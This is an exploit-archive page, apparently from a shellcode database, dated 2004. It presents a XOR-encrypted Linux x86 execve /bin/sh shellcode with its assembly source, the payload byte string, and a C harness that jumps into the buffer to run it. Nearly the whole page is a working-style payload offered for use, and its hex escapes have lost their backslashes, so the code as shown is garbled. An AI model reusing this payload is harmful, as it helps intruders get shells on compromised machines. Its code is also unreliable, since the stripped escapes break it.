linux/x86 execve /bin/sh xor encrypted 55 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86 execve /bin/sh xor encrypted 55 bytes
# Published : 2004-09-12
# Author : n/a
# Previous Title : linux/x86 break chroot execve /bin/sh 80 bytes
# Next Title : linux/x86 execve /bin/sh tolower() evasion 41 bytes

/*
.file "xor-encrypted shellcode"
.version "1.0"
.text
	.align 4
.globl main
	.type main,@function
_start:
	xorl	%eax,%eax
	jmp    	0x22
	popl   	%ebx	
	movl	8(%ebx),%edx
	xor	%edx,(%ebx)
	xor	%edx,4(%ebx)
	xor	%edx,%edx
	movl   	%ebx,0x8(%esp)
	movl   	%edx,0xc(%esp)
	movb   	$0xb,%al
	leal   	0x8(%esp),%ecx
	int    	$0x80
	xorl   	%ebx,%ebx
	movl   	%ebx,%eax
	incl   	%eax
	int   	$0x80
	call	-0x27
	.string "x6ex23x28x2fx6ex32x29x41x41x41x41x41"
*/

#define NAME "encrypted"

char code[]=
"x31xc0xebx22x5bx8bx53x08x31x13x31x53x04x31xd2x89"
"x5cx24x08x89x54x24x0cxb0x0bx8dx4cx24x08xcdx80x31"
"xdbx89xd8x40xcdx80xe8xd9xffxffxff"
"x6ex23x28x2fx6ex32x29x41" /* encrypted "/bin/sh" */
"x41x41x41x41";     /* Conversion chars */

main()
{
  int (*funct)();
  funct = (int (*)()) code;
  printf("%s shellcodentSize = %dn",NAME,strlen(code));
  (int)(*funct)();
}

// www.Syue.com [2004-09-12]